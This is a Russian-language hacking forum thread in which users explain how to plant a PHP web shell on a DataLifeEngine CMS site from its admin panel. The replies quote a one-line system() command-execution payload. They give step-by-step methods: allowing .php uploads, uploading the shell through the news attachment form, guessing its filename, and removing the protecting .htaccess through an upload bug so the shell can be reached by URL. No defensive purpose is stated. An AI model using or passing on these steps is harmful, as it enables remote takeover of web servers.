Всем привет. Есть доступ в админку DataLifeEngine. Как можно залить шел, чтоб изменить некоторые файлы на 777 ?
Да, была такая фишка, но её прикрыли ещё на 6.7 версии если я не ошибаюсьВ админке там где настройка системы, в каком-то поле можно было вписать <?=system($_GET['p']);?> и это вписалось бы в конфиг и через индекс можно было вызвать. Не помню подробностей к сожалению)
Заходишь в "настройка системы" => "настройка загрузки файлов на сервер" => "Расширение файлов, допустимых к загрузке" дописываешь PHP. Потом "Добавить новость" там не чё не заполняем и новость не добавляем... просто "загрузка файлов на сервер" загружаешь значит свой шелл... он сохраняется в ...\uploads\files\десять цифр_название.php а потом пробиваешь на валидность... (десять чисел подобрать нереально поэтому предлагаю тебе написать мне в момент заливки шелла чтобы я тебе сказал примерное число... разброс будет не больше тысячи)
Подождите. А кто мешает простейший шелл встроить в сам шаблон. Через правку шаблона?
- в настройках разрешил аплоад файлов с расширением htaccess
- приаттачил к новости файл .htaccess (в формочке с именем "uploads/files/ " надо указать тоже .htaccess). Из-за бага приаттаченый файл оказывается не тем, что я аплоадил а "истинным" .htaccess
- просто удаляю аттач и .htaccess'а как и не бывало. Могу напрямую обращаться к шеллу как-то так:
http://site.com/uploads/files/12345_shell.php